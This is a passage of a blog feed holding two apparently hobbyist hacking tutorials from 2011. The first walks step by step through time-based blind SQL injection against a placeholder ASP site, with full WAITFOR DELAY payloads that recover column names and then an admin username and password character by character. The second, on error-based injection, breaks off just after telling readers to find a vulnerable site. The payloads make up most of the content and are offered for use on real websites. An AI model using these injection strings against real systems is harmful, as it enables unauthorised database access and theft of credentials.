margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (len(select top 1 column_name from CEE.information_schema.columns where table_name='USERS')=8) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;ok here we say we select the column name from database (thats the name we had at start DB_NAME) this one is CEE. we select this out of the table users we had above this part.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;It has 8 characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;now we need the characters to&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_create" name="AdBriteInlineAd_create" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;create&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;the name.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;First letter is U&lt;br /&gt;www.[site].com/index.asp?id=1;; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;second letter is an S.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;third letter is an E.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Fourth letter is an R.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--&amp;nbsp;&lt;br /&gt;&lt;br /&gt;fifth letter is an n.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),5,1)))=110) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;second letter is an a.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),6,1)))=97) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;second letter is an m.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),7,1)))=111) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;second letter is an e.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),8,1)))=101) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;column name is username.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we need to extract the others. in some cases you could have up to 10.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets say i only have 2 username and pass to keep it easy.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the second column name hase 4 characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name&amp;gt;'USER')=4) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the charracters:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;first letter is P.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name&amp;gt;'username'),1,1)))=112) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Second letter is A.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name&amp;gt;'username'),2,1)))=97) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;third letter is S.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name&amp;gt;'username'),3,1)))=115) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;forth letter is S.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name&amp;gt;'username'),4,1)))=115) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;so we now have the column pass.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;looks like we finally get somewhere.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we have column username and pass! yay.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but not yet there not yet.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Extracting rows from columns.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;extracting from column username.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;count of characters: 5&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 username from USERS)=5) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;what do we do here? we select whats in the column username from table users.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to extract the characters now:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;first letter is A.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Second letter is D.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;third letter is M.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;fourth letter is I.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Fith letter is N.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We now have the name admin. (the one we need.)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;extracting from column pass.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 pass from USERS)=5) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to extract the characters now:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;first letter is e.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),1,1))=101) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Second letter is f.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),2,1))=102) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;third letter is f.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),3,1))=102) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;fourth letter is e.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),4,1))=101) WAITFOR DELAY '00:00:10'--&lt;br /&gt;&lt;br /&gt;Fith letter is c.&lt;br /&gt;www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),5,1))=99) WAITFOR DELAY '00:00:10'--&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;pass= effec&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we have username: admin and his pass effec.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-8152607237958794066?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/8152607237958794066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/8152607237958794066'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/basic-blind-sql-injection.html' title='Basic blind Sql Injection'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-8979225552702112136</id><published>2011-12-16T22:40:00.000+08:00</published><updated>2011-12-16T22:40:04.024+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Double query(error based blind sQl Injection</title><content type='html'>&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;. This tutorial.&lt;br /&gt;2. Notepad. Because, using a pen and paper would take to long.&lt;br /&gt;3. A vulnerable site.&lt;br /&gt;4.&lt;span style="color: red;"&gt;I strongly suggest the hackbar for this!&lt;/span&gt;&lt;br /&gt;It helps you have a fine overlook at the code.&lt;br /&gt;And is very easy to combine whit this tutorial.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/hackbar/" style="-webkit-background-clip: padding-box; color: #308cff; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;Download Hackbar&lt;/a&gt;&lt;/div&gt;&lt;span style="background-color: white; color: grey; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;part 1. Recognising the injection.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;-- Checking vulnerability.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;-- checking column count.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;-- checking union statement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; color: grey; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;Part 2. extracting information double query!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;-- Exploit codes&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ version&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ database&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ database user&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ table count&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ table names&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ column count&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ column names&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ Extracting inforlation&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;-- Output exploit.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ version&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ database&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ database user&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ table count&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ table names&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ column count&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ column names&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+ Extracting inforlation&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;Lets start.&lt;br /&gt;&lt;span style="color: green;"&gt;part 1. Recognising the injection.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;1. Checking vulnerability.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Enter ' behind the link&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: 